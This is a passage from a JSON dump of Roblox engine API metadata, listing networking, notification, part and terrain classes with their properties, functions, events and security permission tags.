:"Event"},{"Superclass":"NetworkPeer","type":"Class","Name":"NetworkServer","tags":["notCreatable"]},{"ValueType":"int","type":"Property","Name":"Port","tags":["readonly"],"Class":"NetworkServer"},{"ReturnType":"void","Arguments":[],"Name":"ConfigureAsCloudEditServer","tags":["RobloxSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ConfigureAsTeamTestServer","tags":["RobloxSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetClientCount","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetIsPlayerAuthenticationRequired","tags":["RobloxSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"port","Default":"0"},{"Type":"int","Name":"threadSleepTime","Default":"20"}],"Name":"Start","tags":["PluginSecurity"],"Class":"NetworkServer","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"blockDuration","Default":"1000"}],"Name":"Stop","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Function"},{"Arguments":[{"Name":"peer","Type":"Instance"},{"Name":"result","Type":"FilterResult"},{"Name":"instance","Type":"Instance"},{"Name":"member","Type":"string"}],"Name":"DataBasicFiltered","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Event"},{"Arguments":[{"Name":"peer","Type":"Instance"},{"Name":"result","Type":"FilterResult"},{"Name":"instance","Type":"Instance"},{"Name":"member","Type":"string"}],"Name":"DataCustomFiltered","tags":["LocalUserSecurity"],"Class":"NetworkServer","type":"Event"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"replicator","Type":"Instance"}],"Name":"IncommingConnection","tags":["RobloxScriptSecurity"],"Class":"NetworkServer","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"NetworkReplicator","tags":["notCreatable"]},{"ValueType":"string","type":"Property","Name":"MachineAddress","tags":["LocalUserSecurity","readonly"],"Class":"NetworkReplicator"},{"ValueType":"int","type":"Property","Name":"Port","tags":["LocalUserSecurity","readonly"],"Class":"NetworkReplicator"},{"ReturnType":"void","Arguments":[],"Name":"CloseConnection","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"DisableProcessPackets","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"EnableProcessPackets","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetPlayer","tags":[],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"int","Name":"verbosityLevel","Default":"0"}],"Name":"GetRakStatsString","tags":["PluginSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RequestCharacter","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"SendMarker","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"double","Name":"seconds","Default":null}],"Name":"SetPropSyncExpiration","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Function"},{"Arguments":[{"Name":"peer","Type":"string"},{"Name":"lostConnection","Type":"bool"}],"Name":"Disconnection","tags":["LocalUserSecurity"],"Class":"NetworkReplicator","type":"Event"},{"Superclass":"NetworkReplicator","type":"Class","Name":"ClientReplicator","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"request","Default":null}],"Name":"RequestServerStats","tags":["RobloxScriptSecurity"],"Class":"ClientReplicator","type":"Function"},{"Arguments":[{"Name":"stats","Type":"Dictionary"}],"Name":"StatsReceived","tags":["RobloxScriptSecurity"],"Class":"ClientReplicator","type":"Event"},{"Superclass":"NetworkReplicator","type":"Class","Name":"ServerReplicator","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[],"Name":"PreventTerrainChanges","tags":["RobloxPlaceSecurity"],"Class":"ServerReplicator","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"value","Default":null}],"Name":"SetBasicFilteringEnabled","tags":["RobloxPlaceSecurity"],"Class":"ServerReplicator","type":"Function"},{"Arguments":[{"Name":"userId","Type":"int"},{"Name":"isAuthenticated","Type":"bool"},{"Name":"protocolVersion","Type":"int"}],"Name":"TicketProcessed","tags":[],"Class":"ServerReplicator","type":"Event"},{"ReturnType":"FilterResult","Arguments":[{"Name":"deletingItem","Type":"Instance"}],"Name":"DeleteFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"ReturnType":"FilterResult","Arguments":[{"Name":"firingItem","Type":"Instance"},{"Name":"event","Type":"string"}],"Name":"EventFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"ReturnType":"FilterResult","Arguments":[{"Name":"newItem","Type":"Instance"},{"Name":"parent","Type":"Instance"}],"Name":"NewFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"ReturnType":"FilterResult","Arguments":[{"Name":"changingItem","Type":"Instance"},{"Name":"member","Type":"string"},{"Name":"value","Type":"Variant"}],"Name":"PropertyFilter","tags":["RobloxPlaceSecurity","noyield"],"Class":"ServerReplicator","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"NetworkSettings","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"ArePhysicsRejectionsReported","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"CanSendPacketBufferLimit","tags":[],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"ClientPhysicsSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"DataGCRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"DataMtuAdjust","tags":[],"Class":"NetworkSettings"},{"ValueType":"PacketPriority","type":"Property","Name":"DataSendPriority","tags":["hidden"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"DataSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"EnableHeavyCompression","tags":["hidden"],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"ExperimentalPhysicsEnabled","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"ExtraMemoryUsed","tags":["PluginSecurity","hidden"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"FreeMemoryMBytes","tags":["PluginSecurity","hidden","readonly"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"FreeMemoryPoolMBytes","tags":["PluginSecurity","hidden","readonly"],"Class":"NetworkSettings"},{"ValueType":"double","type":"Property","Name":"IncommingReplicationLag","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"IsQueueErrorComputed","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"IsThrottledByCongestionControl","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"IsThrottledByOutgoingBandwidthLimit","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"MaxDataModelSendBuffer","tags":["deprecated"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"NetworkOwnerRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"PhysicsMtuAdjust","tags":[],"Class":"NetworkSettings"},{"ValueType":"PhysicsReceiveMethod","type":"Property","Name":"PhysicsReceive","tags":[],"Class":"NetworkSettings"},{"ValueType":"PhysicsSendMethod","type":"Property","Name":"PhysicsSend","tags":[],"Class":"NetworkSettings"},{"ValueType":"PacketPriority","type":"Property","Name":"PhysicsSendPriority","tags":["hidden"],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"PhysicsSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"PreferredClientPort","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintBits","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintEvents","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintFilters","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintInstances","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintPhysicsErrors","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintProperties","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintSplitMessage","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintStreamInstanceQuota","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"PrintTouches","tags":[],"Class":"NetworkSettings"},{"ValueType":"double","type":"Property","Name":"ReceiveRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"RenderStreamedRegions","tags":[],"Class":"NetworkSettings"},{"ValueType":"string","type":"Property","Name":"ReportStatURL","tags":["deprecated","hidden"],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"SendPacketBufferLimit","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"ShowActiveAnimationAsset","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"ShowPartMovementWayPoint","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"TotalNumMovementWayPoint","tags":[],"Class":"NetworkSettings"},{"ValueType":"float","type":"Property","Name":"TouchSendRate","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"TrackDataTypes","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"TrackPhysicsDetails","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"UseInstancePacketCache","tags":[],"Class":"NetworkSettings"},{"ValueType":"bool","type":"Property","Name":"UsePhysicsPacketCache","tags":[],"Class":"NetworkSettings"},{"ValueType":"int","type":"Property","Name":"WaitingForCharacterLogRate","tags":["deprecated","hidden"],"Class":"NetworkSettings"},{"Superclass":"Instance","type":"Class","Name":"NotificationService","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"CancelAllNotification","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"alertId","Default":null}],"Name":"CancelNotification","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"userId","Default":null},{"Type":"int","Name":"alertId","Default":null},{"Type":"string","Name":"alertMsg","Default":null},{"Type":"int","Name":"minutesToFire","Default":null}],"Name":"ScheduleNotification","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"int","Name":"userId","Default":null}],"Name":"GetScheduledNotifications","tags":["RobloxPlaceSecurity"],"Class":"NotificationService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"NumberValue","tags":[]},{"ValueType":"double","type":"Property","Name":"Value","tags":[],"Class":"NumberValue"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"Changed","tags":[],"Class":"NumberValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"double"}],"Name":"changed","tags":["deprecated"],"Class":"NumberValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"ObjectValue","tags":[]},{"ValueType":"Object","type":"Property","Name":"Value","tags":[],"Class":"ObjectValue"},{"Arguments":[{"Name":"value","Type":"Instance"}],"Name":"Changed","tags":[],"Class":"ObjectValue","type":"Event"},{"Arguments":[{"Name":"value","Type":"Instance"}],"Name":"changed","tags":["deprecated"],"Class":"ObjectValue","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"OneQuarterClusterPacketCacheBase","tags":[]},{"Superclass":"Instance","type":"Class","Name":"PVInstance","tags":["notbrowsable"]},{"ValueType":"CoordinateFrame","type":"Property","Name":"CoordinateFrame","tags":["deprecated","writeonly"],"Class":"PVInstance"},{"Superclass":"PVInstance","type":"Class","Name":"BasePart","tags":["notbrowsable"]},{"ValueType":"bool","type":"Property","Name":"Anchored","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BackParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BackParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"BackSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"BackSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BottomParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"BottomParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"BottomSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"BottomSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"BrickColor","type":"Property","Name":"BrickColor","tags":[],"Class":"BasePart"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"BasePart"},{"ValueType":"bool","type":"Property","Name":"CanCollide","tags":[],"Class":"BasePart"},{"ValueType":"Color3","type":"Property","Name":"Color","tags":["deprecated"],"Class":"BasePart"},{"ValueType":"PhysicalProperties","type":"Property","Name":"CustomPhysicalProperties","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Elasticity","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Friction","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"FrontParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"FrontParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"FrontSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"FrontSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"LeftParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"LeftParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"LeftSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"LeftSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"LocalTransparencyModifier","tags":["hidden"],"Class":"BasePart"},{"ValueType":"bool","type":"Property","Name":"Locked","tags":[],"Class":"BasePart"},{"ValueType":"Material","type":"Property","Name":"Material","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Position","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"ReceiveAge","tags":["hidden","readonly"],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Reflectance","tags":[],"Class":"BasePart"},{"ValueType":"int","type":"Property","Name":"ResizeIncrement","tags":["readonly"],"Class":"BasePart"},{"ValueType":"Faces","type":"Property","Name":"ResizeableFaces","tags":["readonly"],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"RightParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"RightParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"RightSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"RightSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"RotVelocity","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Rotation","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Size","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"SpecificGravity","tags":["readonly"],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"TopParamA","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"TopParamB","tags":[],"Class":"BasePart"},{"ValueType":"SurfaceType","type":"Property","Name":"TopSurface","tags":[],"Class":"BasePart"},{"ValueType":"InputType","type":"Property","Name":"TopSurfaceInput","tags":[],"Class":"BasePart"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":[],"Class":"BasePart"},{"ValueType":"Vector3","type":"Property","Name":"Velocity","tags":[],"Class":"BasePart"},{"ValueType":"BrickColor","type":"Property","Name":"brickColor","tags":["deprecated"],"Class":"BasePart"},{"ReturnType":"void","Arguments":[],"Name":"BreakJoints","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"CanSetNetworkOwnership","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Objects","Arguments":[{"Type":"bool","Name":"recursive","Default":"false"}],"Name":"GetConnectedParts","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"GetMass","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetNetworkOwner","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"GetNetworkOwnershipAuto","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[],"Name":"GetRenderCFrame","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetRootPart","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"Objects","Arguments":[],"Name":"GetTouchingParts","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsGrounded","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"MakeJoints","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"NormalId","Name":"normalId","Default":null},{"Type":"int","Name":"deltaAmount","Default":null}],"Name":"Resize","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"playerInstance","Default":"nil"}],"Name":"SetNetworkOwner","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"SetNetworkOwnershipAuto","tags":[],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"breakJoints","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"ReturnType":"float","Arguments":[],"Name":"getMass","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"makeJoints","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"NormalId","Name":"normalId","Default":null},{"Type":"int","Name":"deltaAmount","Default":null}],"Name":"resize","tags":["deprecated"],"Class":"BasePart","type":"Function"},{"Arguments":[{"Name":"part","Type":"Instance"}],"Name":"LocalSimulationTouched","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Arguments":[],"Name":"OutfitChanged","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"StoppedTouching","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"TouchEnded","tags":[],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"Touched","tags":[],"Class":"BasePart","type":"Event"},{"Arguments":[{"Name":"otherPart","Type":"Instance"}],"Name":"touched","tags":["deprecated"],"Class":"BasePart","type":"Event"},{"Superclass":"BasePart","type":"Class","Name":"CornerWedgePart","tags":[]},{"Superclass":"BasePart","type":"Class","Name":"FormFactorPart","tags":[]},{"ValueType":"FormFactor","type":"Property","Name":"FormFactor","tags":["deprecated"],"Class":"FormFactorPart"},{"ValueType":"FormFactor","type":"Property","Name":"formFactor","tags":["deprecated","hidden"],"Class":"FormFactorPart"},{"Superclass":"FormFactorPart","type":"Class","Name":"Part","tags":[]},{"ValueType":"PartType","type":"Property","Name":"Shape","tags":[],"Class":"Part"},{"Superclass":"Part","type":"Class","Name":"FlagStand","tags":["deprecated"]},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"FlagStand"},{"Arguments":[{"Name":"player","Type":"Instance"}],"Name":"FlagCaptured","tags":[],"Class":"FlagStand","type":"Event"},{"Superclass":"Part","type":"Class","Name":"Platform","tags":[]},{"Superclass":"Part","type":"Class","Name":"Seat","tags":[]},{"ValueType":"bool","type":"Property","Name":"Disabled","tags":[],"Class":"Seat"},{"ValueType":"Object","type":"Property","Name":"Occupant","tags":["readonly"],"Class":"Seat"},{"Superclass":"Part","type":"Class","Name":"SkateboardPlatform","tags":["deprecated"]},{"ValueType":"Object","type":"Property","Name":"Controller","tags":["readonly"],"Class":"SkateboardPlatform"},{"ValueType":"Object","type":"Property","Name":"ControllingHumanoid","tags":["readonly"],"Class":"SkateboardPlatform"},{"ValueType":"int","type":"Property","Name":"Steer","tags":[],"Class":"SkateboardPlatform"},{"ValueType":"bool","type":"Property","Name":"StickyWheels","tags":[],"Class":"SkateboardPlatform"},{"ValueType":"int","type":"Property","Name":"Throttle","tags":[],"Class":"SkateboardPlatform"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"impulseWorld","Default":null}],"Name":"ApplySpecificImpulse","tags":[],"Class":"SkateboardPlatform","type":"Function"},{"Arguments":[{"Name":"humanoid","Type":"Instance"},{"Name":"skateboardController","Type":"Instance"}],"Name":"Equipped","tags":[],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"newState","Type":"MoveState"},{"Name":"oldState","Type":"MoveState"}],"Name":"MoveStateChanged","tags":[],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"humanoid","Type":"Instance"}],"Name":"Unequipped","tags":[],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"humanoid","Type":"Instance"},{"Name":"skateboardController","Type":"Instance"}],"Name":"equipped","tags":["deprecated"],"Class":"SkateboardPlatform","type":"Event"},{"Arguments":[{"Name":"humanoid","Type":"Instance"}],"Name":"unequipped","tags":["deprecated"],"Class":"SkateboardPlatform","type":"Event"},{"Superclass":"Part","type":"Class","Name":"SpawnLocation","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllowTeamChangeOnTouch","tags":[],"Class":"SpawnLocation"},{"ValueType":"int","type":"Property","Name":"Duration","tags":[],"Class":"SpawnLocation"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"SpawnLocation"},{"ValueType":"bool","type":"Property","Name":"Neutral","tags":[],"Class":"SpawnLocation"},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"SpawnLocation"},{"Superclass":"FormFactorPart","type":"Class","Name":"WedgePart","tags":[]},{"Superclass":"BasePart","type":"Class","Name":"MeshPart","tags":[]},{"ValueType":"Material","type":"Property","Name":"Material","tags":["deprecated","readonly"],"Class":"MeshPart"},{"ValueType":"Content","type":"Property","Name":"TextureID","tags":[],"Class":"MeshPart"},{"Superclass":"BasePart","type":"Class","Name":"ParallelRampPart","tags":["deprecated","notbrowsable"]},{"Superclass":"BasePart","type":"Class","Name":"PartOperation","tags":[]},{"ValueType":"bool","type":"Property","Name":"UsePartColor","tags":[],"Class":"PartOperation"},{"Superclass":"PartOperation","type":"Class","Name":"NegateOperation","tags":[]},{"Superclass":"PartOperation","type":"Class","Name":"UnionOperation","tags":[]},{"Superclass":"BasePart","type":"Class","Name":"PrismPart","tags":["deprecated","notbrowsable"]},{"ValueType":"PrismSides","type":"Property","Name":"Sides","tags":[],"Class":"PrismPart"},{"Superclass":"BasePart","type":"Class","Name":"PyramidPart","tags":["deprecated","notbrowsable"]},{"ValueType":"PyramidSides","type":"Property","Name":"Sides","tags":[],"Class":"PyramidPart"},{"Superclass":"BasePart","type":"Class","Name":"RightAngleRampPart","tags":["deprecated","notbrowsable"]},{"Superclass":"BasePart","type":"Class","Name":"Terrain","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"IsSmooth","tags":["readonly"],"Class":"Terrain"},{"ValueType":"Region3int16","type":"Property","Name":"MaxExtents","tags":["readonly"],"Class":"Terrain"},{"ValueType":"Color3","type":"Property","Name":"WaterColor","tags":[],"Class":"Terrain"},{"ValueType":"float","type":"Property","Name":"WaterTransparency","tags":[],"Class":"Terrain"},{"ValueType":"float","type":"Property","Name":"WaterWaveSize","tags":[],"Class":"Terrain"},{"ValueType":"float","type":"Property","Name":"WaterWaveSpeed","tags":[],"Class":"Terrain"},{"ReturnType":"bool","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"AutowedgeCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3int16","Name":"region","Default":null}],"Name":"AutowedgeCells","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"CellCenterToWorld","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"CellCornerToWorld","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Clear","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ConvertToSmooth","tags":["PluginSecurity"],"Class":"Terrain","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Region3int16","Name":"region","Default":null}],"Name":"CopyRegion","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"CountCells","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"center","Default":null},{"Type":"float","Name":"radius","Default":null},{"Type":"Material","Name":"material","Default":null}],"Name":"FillBall","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"CoordinateFrame","Name":"cframe","Default":null},{"Type":"Vector3","Name":"size","Default":null},{"Type":"Material","Name":"material","Default":null}],"Name":"FillBlock","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"float","Name":"resolution","Default":null},{"Type":"Material","Name":"material","Default":null}],"Name":"FillRegion","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"GetCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null}],"Name":"GetWaterCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"region","Default":null},{"Type":"Vector3int16","Name":"corner","Default":null},{"Type":"bool","Name":"pasteEmptyCells","Default":null}],"Name":"PasteRegion","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Tuple","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"float","Name":"resolution","Default":null}],"Name":"ReadVoxels","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null},{"Type":"CellMaterial","Name":"material","Default":null},{"Type":"CellBlock","Name":"block","Default":null},{"Type":"CellOrientation","Name":"orientation","Default":null}],"Name":"SetCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3int16","Name":"region","Default":null},{"Type":"CellMaterial","Name":"material","Default":null},{"Type":"CellBlock","Name":"block","Default":null},{"Type":"CellOrientation","Name":"orientation","Default":null}],"Name":"SetCells","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"x","Default":null},{"Type":"int","Name":"y","Default":null},{"Type":"int","Name":"z","Default":null},{"Type":"WaterForce","Name":"force","Default":null},{"Type":"WaterDirection","Name":"direction","Default":null}],"Name":"SetWaterCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"WorldToCell","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"WorldToCellPreferEmpty","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"Vector3","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"WorldToCellPreferSolid","tags":[],"Class":"Terrain","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Region3","Name":"region","Default":null},{"Type":"float","Name":"resolution","Default":null},{"Type":"Array","Name":"materials","Default":null},{"Type":"Array","Name":"occupancy","Default":null}],"Name":"WriteVoxels","tags":[],"Class":"Terrain","type":"Function"},{"Superclass":"BasePart","type":"Class","Name":"TrussPart","tags":[]},{"ValueType":"Style","type":"Property","Name":"Style","tags":[],"Class":"TrussPart"},{"Superclass":"BasePart","type":"Class","Name":"VehicleSeat","tags":[]},{"ValueType":"int","type":"Property","Name":"AreHingesDetected","tags":["readonly"],"Class":"VehicleSeat"},{"ValueType":"bool","type":"Property","Name":"Disabled","t